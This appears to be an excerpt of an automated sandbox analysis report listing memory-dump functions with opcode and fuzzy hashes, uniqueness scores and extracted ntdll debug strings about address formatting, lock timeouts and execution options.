            • Instruction Fuzzy Hash: B89002A121200043420571695414616400A97E0342F51D031F1004590DC56588A1B165
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f218cf5a67f9e267f0f2c54e4b7998ea9c76f6960a8ecad15c1d7783ef651654
            • Instruction ID: c3a4e59165bb1cfd9651c5db2e65c8204cfafaffc55937708827c7f2fa9e4519
            • Opcode Fuzzy Hash: f218cf5a67f9e267f0f2c54e4b7998ea9c76f6960a8ecad15c1d7783ef651654
            • Instruction Fuzzy Hash: 479002E1211140D24600A2699404B0A450597E0342F51D026F1044560CC5658861E175
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c9dc95583015ba26b79d1f48c1b7913a92f24530c534af26380d190af848b968
            • Instruction ID: 88d313cbbc48bb387848d8124f7d07219a2326397c1054d2054d3b51c0f96661
            • Opcode Fuzzy Hash: c9dc95583015ba26b79d1f48c1b7913a92f24530c534af26380d190af848b968
            • Instruction Fuzzy Hash: F3900265231000420245A569160450B0445A7D6392791D025F1406590CC6618875A361
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4688c8091f764dfecdb99d4e5bf85dae24bba103e3c1d566dc7f2fdddfa66ab2
            • Instruction ID: bfbd9d35b58bb8fb94f9e7788d374255e2aa75cc844bb95f49eca846b6633530
            • Opcode Fuzzy Hash: 4688c8091f764dfecdb99d4e5bf85dae24bba103e3c1d566dc7f2fdddfa66ab2
            • Instruction Fuzzy Hash: 4D900265221000430205A5691704507004697D5392751D031F1005550CD6618871A161
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e00c59a42a699ddd8b65483b674901ac25913b7dc6dd7e05dcf0c387a1e77ecb
            • Instruction ID: 58033d7f98d1b60aa740ead1afafd0e9256d116ac136a58c7e365a856984d042
            • Opcode Fuzzy Hash: e00c59a42a699ddd8b65483b674901ac25913b7dc6dd7e05dcf0c387a1e77ecb
            • Instruction Fuzzy Hash: DA90027121100882D20061695404B46000597E0342F51D026B0114654DC655C861B561
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2ba5cd881c122d3ac83adc4c0e3992cb956fa02038d7e93e82f9336d28ac6c73
            • Instruction ID: 7a791d9259e2e293785f79c5dc14f5551cb1e3bb9eb732098c8077bd9e179512
            • Opcode Fuzzy Hash: 2ba5cd881c122d3ac83adc4c0e3992cb956fa02038d7e93e82f9336d28ac6c73
            • Instruction Fuzzy Hash: C790027161500842D25071695414746000597D0342F51D021B0014654DC7958A65B6E1
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3689a19cb9b7ab6e0eac93487efe107fb849d87b286fda3ae871b85b1f29df9e
            • Instruction ID: dca77a5e81f101ac3e56e5004acb83d33bb4d3fbed8424cbaf343e0a17c79658
            • Opcode Fuzzy Hash: 3689a19cb9b7ab6e0eac93487efe107fb849d87b286fda3ae871b85b1f29df9e
            • Instruction Fuzzy Hash: D890027121504882D24071695404A46001597D0346F51D021B0054694DD6658D65F6A1
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3c54286343b6ed4c7ae099012c55aad2de5dca3deabf300569b63c4933a98af3
            • Instruction ID: dea76e4413910ae6a6a88a39a6de04067b22dcc804daa29ac78505f840d16c56
            • Opcode Fuzzy Hash: 3c54286343b6ed4c7ae099012c55aad2de5dca3deabf300569b63c4933a98af3
            • Instruction Fuzzy Hash: 6A90026131100043D240716964186064005E7E1342F51E021F0404554CD9558866A262
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 16eb918c4f61beebe3d93807a58484dc49fbdb83d3502b05d7ecedc742640876
            • Instruction ID: 99d4593e81239358acfea8e4664647f5983c00d91cb8b863d5a3df54ac53e714
            • Opcode Fuzzy Hash: 16eb918c4f61beebe3d93807a58484dc49fbdb83d3502b05d7ecedc742640876
            • Instruction Fuzzy Hash: F590026922300042D2807169640860A000597D1343F91E425B0005558CC9558879A361
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b8917a14c576201641a2da2d80daa4b6c3ed90dc8d451da82f09ebfd04c5c702
            • Instruction ID: b0985335340f4111ce3ad64b8edaba112fd36d8b6e9bce620c9411c5f4956e8e
            • Opcode Fuzzy Hash: b8917a14c576201641a2da2d80daa4b6c3ed90dc8d451da82f09ebfd04c5c702
            • Instruction Fuzzy Hash: A190026161500442D24071696418706001597D0342F51E021B0014554DC6998A65B6E1
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8fbca4cecff82d7a06d085ff61accf2488f005a9de47ca8580fcf0cedf45f830
            • Instruction ID: 8655fafa0e76b3e75747a8d9232a2d1bd598157e15b30bee04855c4ca57cc492
            • Opcode Fuzzy Hash: 8fbca4cecff82d7a06d085ff61accf2488f005a9de47ca8580fcf0cedf45f830
            • Instruction Fuzzy Hash: 7990027121100442D20065A96408646000597E0342F51E021B5014555EC6A588A1B171
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6b5f9c76238483c0ee5d46ea2b6489dbd52ab509f85e599420c5439311a396de
            • Instruction ID: 51e51ea4a05065a9693225010ec7c7fda0cb801d0d001338c3074e3345eadf3c
            • Opcode Fuzzy Hash: 6b5f9c76238483c0ee5d46ea2b6489dbd52ab509f85e599420c5439311a396de
            • Instruction Fuzzy Hash: 22900271311000929600A6A96804A4A410597F0342F51E025B4004554CC5948871A161
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4405254ebcaba8fd17f11fcb82dc56c5dc365ea9ec4203c837278233cc0f3de5
            • Instruction ID: 98bd6f5a0c67977cc344b4d0e86cef3e958255e05858bb21b61fc0693ad9cece
            • Opcode Fuzzy Hash: 4405254ebcaba8fd17f11fcb82dc56c5dc365ea9ec4203c837278233cc0f3de5
            • Instruction Fuzzy Hash: 6590027121100443D20061696508707000597D0342F51E421B0414558DD6968861B161
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a8c948bb69a67095e3a1493f82ef8fed94ac5dbee5cefd43a4e689762ca6cfdb
            • Instruction ID: a0782fea75cf03e07e68d1630232048781ec485acb2ce5f281b06d1cf94aa47c
            • Opcode Fuzzy Hash: a8c948bb69a67095e3a1493f82ef8fed94ac5dbee5cefd43a4e689762ca6cfdb
            • Instruction Fuzzy Hash: 7690027521504482D60065696804A87000597D0346F51E421B041459CDC6948871F161
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 080eeaebb8c78dd77d3e0922e0881a767f5928c816c1dd225868650ed376f89b
            • Instruction ID: c9ca4c14c62dab5ceb4648514fff346d99ff6a5792fe774a1e3363163a8ed02f
            • Opcode Fuzzy Hash: 080eeaebb8c78dd77d3e0922e0881a767f5928c816c1dd225868650ed376f89b
            • Instruction Fuzzy Hash: DD90026121504482D20065696408A06000597D0346F51E021B1054595DC6758861F171
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f30b2e47baa18727bb04a0baa26f7ddcbd4f2a9908845587a80a06bcf9c8a626
            • Instruction ID: 78efa16da1abecb392e832394c797e00fcb16e31dc0a5ace07b4901a40fafbcd
            • Opcode Fuzzy Hash: f30b2e47baa18727bb04a0baa26f7ddcbd4f2a9908845587a80a06bcf9c8a626
            • Instruction Fuzzy Hash: D090026131100442D202616954146060009D7D1386F91D022F1414555DC6658963F172
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 06deb6f5c14df4f62de4b8f8e0c34ba5e23444f6ce369302ec7c809ef988e396
            • Instruction ID: 17adb3a3ecd364c71b2e277dd3572c09af7dbf22e6d9df9bad95334f38644b2d
            • Opcode Fuzzy Hash: 06deb6f5c14df4f62de4b8f8e0c34ba5e23444f6ce369302ec7c809ef988e396
            • Instruction Fuzzy Hash: 5E90026161100542D20171695404616000A97D0382F91D032B1014555ECA6589A2F171
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e0cb2d8a5dd7d671046ebfc7af4efa9abfd3b0c5638058bac5fffb8529e880e7
            • Instruction ID: 820b6426713029a2b416e24929c2ea565243846d4a42fee74c446070dfdc2fba
            • Opcode Fuzzy Hash: e0cb2d8a5dd7d671046ebfc7af4efa9abfd3b0c5638058bac5fffb8529e880e7
            • Instruction Fuzzy Hash: DC90027125100442D241716954046060009A7D0382F91D022B0414554EC6958A66FAA1
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 129948ba27a5daad941a1e69d1007ae0c8f929981630e4800dff0bfa76a6adca
            • Instruction ID: 5b0e79e397798ce0a5558aef6f541b9726d07febc4ac6e89d3e835623ade9a29
            • Opcode Fuzzy Hash: 129948ba27a5daad941a1e69d1007ae0c8f929981630e4800dff0bfa76a6adca
            • Instruction Fuzzy Hash: D2900261252041925645B16954045074006A7E0382B91D022B1404950CC5669866E661
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 572c448c98a273c8b2069a40d9132174258c54371a16429ed22d9e9cecb2da62
            • Instruction ID: 04430e91dc2d1331fcd62be2e282a526a6e9c9f4b79d9e5832856d84c7b6c94f
            • Opcode Fuzzy Hash: 572c448c98a273c8b2069a40d9132174258c54371a16429ed22d9e9cecb2da62
            • Instruction Fuzzy Hash: D79002A135100482D20061695414B060005D7E1342F51D025F1054554DC659CC62B166
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9bad995cf343491b5d518dd3250fd1b6315584fb6aad13cc0931a1b36776192b
            • Instruction ID: 461ac2054de609563eba3da2ab13e6b9c88ac7c79f26918b89d61e1b5b0613ac
            • Opcode Fuzzy Hash: 9bad995cf343491b5d518dd3250fd1b6315584fb6aad13cc0931a1b36776192b
            • Instruction Fuzzy Hash: 449002A122100082D20461695404706004597E1342F51D022B2144554CC5698C71A165
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6c2869441fbe63aff897381dd182d294a13da8c1d43b12b59543032825fb03ff
            • Instruction ID: 5eec4ef28b877f572f8220654545f629d871ac2782f42b3eb80d7f61d9b05f29
            • Opcode Fuzzy Hash: 6c2869441fbe63aff897381dd182d294a13da8c1d43b12b59543032825fb03ff
            • Instruction Fuzzy Hash: 0F9002B121100442D24071695404746000597D0342F51D021B5054554EC6998DE5B6A5
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8749658355800040322b73e1c9c278acde51cba1456138f90cb18ebf14710296
            • Instruction ID: 634afb5ba80719d435eb7329ffe9549410d2d56759ab8111d3033557ccb436f4
            • Opcode Fuzzy Hash: 8749658355800040322b73e1c9c278acde51cba1456138f90cb18ebf14710296
            • Instruction Fuzzy Hash: 959002A121140443D24065695804607000597D0343F51D021B2054555ECA698C61B175
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0fa9bd0c13e3befc94f5050fe9feaa13557cd02caa8e5ba01af244e3d93dc0db
            • Instruction ID: 30d200857ee8fc2acc604009912f2f43a21844d5dcde93fe0ddaa4093df28f48
            • Opcode Fuzzy Hash: 0fa9bd0c13e3befc94f5050fe9feaa13557cd02caa8e5ba01af244e3d93dc0db
            • Instruction Fuzzy Hash: EA90026121144482D24062695804B0F410597E1343F91D029B4146554CC9558865A761
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d8b55692db6d71a6f2276583fbc4953a5133472000b6b46352cdd11386a6ddd8
            • Instruction ID: b72da16297ca79d31398e5f700cf72b3d539bdeb780ff61ea39e9fab882bf61d
            • Opcode Fuzzy Hash: d8b55692db6d71a6f2276583fbc4953a5133472000b6b46352cdd11386a6ddd8
            • Instruction Fuzzy Hash: 27900261611000824240717998449064005BBE1352B51D131B0988550DC5998875A6A5
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2427cea116cf97ab25964171a80dfae812fa9137a691291182c88622be40c982
            • Instruction ID: 6701683ed14710fa320259735127c32efe139d5afcfd52a3b7ec47f02e60d19c
            • Opcode Fuzzy Hash: 2427cea116cf97ab25964171a80dfae812fa9137a691291182c88622be40c982
            • Instruction Fuzzy Hash: A190027121140442D2006169581470B000597D0343F51D021B1154555DC6658861B5B1
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4741bb99e465c8fc92c9bf73d8a6baaf0161ac1601354822344458e9f605f2ce
            • Instruction ID: b30f15eb9f0da88696f42aaf7003100224571150e13d2cfae9b3460935fdaf02
            • Opcode Fuzzy Hash: 4741bb99e465c8fc92c9bf73d8a6baaf0161ac1601354822344458e9f605f2ce
            • Instruction Fuzzy Hash: 9790027121140442D20061695808747000597D0343F51D021B5154555EC6A5C8A1B571
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 27fe05028c4ca36f86e524aac8d021d84bcd97eb402f5f6ec26d3bc3a5ca2b22
            • Instruction ID: 8cd0c1340ef06e58be87b68b7ca70733bdaea9fe279cce7e6aab9b8b6689aedd
            • Opcode Fuzzy Hash: 27fe05028c4ca36f86e524aac8d021d84bcd97eb402f5f6ec26d3bc3a5ca2b22
            • Instruction Fuzzy Hash: 1B90026122180082D30065795C14B07000597D0343F51D125B0144554CC9558871A561
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9de8a8d3112d1e11ea477d11abfbdf41f5b66f722a3b32902895a99086e540c0
            • Instruction ID: 3ca9b87c567da8deca3e191ac896c65c3e861194dff2351daecd4b269f48eb60
            • Opcode Fuzzy Hash: 9de8a8d3112d1e11ea477d11abfbdf41f5b66f722a3b32902895a99086e540c0
            • Instruction Fuzzy Hash: 1790026125100842D240716994147070006D7D0742F51D021B0014554DC6568975B6F1
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e221dec8810734be87c337c41cae2373cb67d76f5dedc83528ceabef4719d75b
            • Instruction ID: d5a649f90e2217b645b60e81489f0c9fa0dabcfd43bcf22c2c7f33de4fdfe7ec
            • Opcode Fuzzy Hash: e221dec8810734be87c337c41cae2373cb67d76f5dedc83528ceabef4719d75b
            • Instruction Fuzzy Hash: DF900271A15000529240716958146464006A7E0782F55D021B0504554CC9948A65A3E1
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f93c05ab3930df8011cc19e2ca6c597b0c9e0730e67325ecbeb6f2d00cc26278
            • Instruction ID: e53eeb4bad8babaa9b63d5785c5fc4a05f4eef394cd11a09c56404b36accd684
            • Opcode Fuzzy Hash: f93c05ab3930df8011cc19e2ca6c597b0c9e0730e67325ecbeb6f2d00cc26278
            • Instruction Fuzzy Hash: 2B90027132114442D21061699404706000597D1342F51D421B0814558DC6D588A1B162
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
            • Instruction ID: f8c46b5b903e7e891c1a59c77e2e55a87bea8a9ed6a1326f8c85d08c412e7983
            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
            • Instruction Fuzzy Hash:
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: ___swprintf_l
            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
            • API String ID: 48624451-2108815105
            • Opcode ID: 3bdc1e842b8540c86782cee92ecbb86820db7ded6ac8e4206b2b6710f23806ef
            • Instruction ID: b85e128fd250ff274b36b7e2b1573038ac5ecf6ee9618440de7694df97b9d404
            • Opcode Fuzzy Hash: 3bdc1e842b8540c86782cee92ecbb86820db7ded6ac8e4206b2b6710f23806ef
            • Instruction Fuzzy Hash: 7A61D3B5A04156BBCB11DF998D80A7EF7B8FF48300B60826AF894D7681D374DE5097A2
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • CLIENT(ntdll): Processing section info %ws..., xrefs: 00A405F1
            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00A404BF
            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00A40566
            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00A4058F
            • ExecuteOptions, xrefs: 00A4050A
            • Execute=1, xrefs: 00A4057D
            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00A405AC
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
            • API String ID: 0-484625025
            • Opcode ID: 372e9cb38d825702bc76321cd0886f4d8b21b8a1f6b1fdfce3e9e257109fafcb
            • Instruction ID: d94d2ad7d57da9499d7b033d26a97cf60c2807a332dc2e7cd82de0c4e53af79c
            • Opcode Fuzzy Hash: 372e9cb38d825702bc76321cd0886f4d8b21b8a1f6b1fdfce3e9e257109fafcb
            • Instruction Fuzzy Hash: 3F616E71A002597BDF11DBA5ED86FE977BCEFA4305F0400A9F609A7181DB709E818F61
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A42953
            Strings
            • RTL: Re-Waiting, xrefs: 00A42988
            • RTL: Resource at %p, xrefs: 00A4296B
            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00A4295B
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
            • API String ID: 885266447-605551621
            • Opcode ID: 3279be35f955261c0afb2875bd96d32b983373f1f2d63b8ea39f4f76fa3a612e
            • Instruction ID: 0c8f74f7a6d7588daf778c7c43655cc710d568ea3ea8fbce2c335223b2db2614
            • Opcode Fuzzy Hash: 3279be35f955261c0afb2875bd96d32b983373f1f2d63b8ea39f4f76fa3a612e
            • Instruction Fuzzy Hash: 49318A35A00631BBCB218B26CC81F6BBB64EF95B20F504214FD486B682CB22FC11C7E1
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: $$@
            • API String ID: 0-1194432280
            • Opcode ID: a793c4c33d0ad93e1f56dc8ca3d4c9343542b272a6485ec793078018bf8b475b
            • Instruction ID: 186fcc552d92d4f2006eb955a8102846234c580f1cb3bc55275079a256477cb7
            • Opcode Fuzzy Hash: a793c4c33d0ad93e1f56dc8ca3d4c9343542b272a6485ec793078018bf8b475b
            • Instruction Fuzzy Hash: 08812671D00269DBDB31DF54DD45BEEB6B8AB09714F0141EAAA0DB7280E7309E85CFA0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A7FDFA
            Strings
            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A7FE2B
            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A7FE01
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
            • API String ID: 885266447-3903918235
            • Opcode ID: 7e6ca2958345812976de64821de685f8295b1c022727ee24c9699d3948fe9db5
            • Instruction ID: b0b65e2aff501b94627cc11b22b82ebca0d5c5f5b16974e166a8aead0f794602
            • Opcode Fuzzy Hash: 7e6ca2958345812976de64821de685f8295b1c022727ee24c9699d3948fe9db5
            • Instruction Fuzzy Hash: AEF0F632640601BFDA241B55DD02F23BB6AEB84730F24C315F628565E1DAA2FD2096F4
            Uniqueness

            Uniqueness Score: -1.00%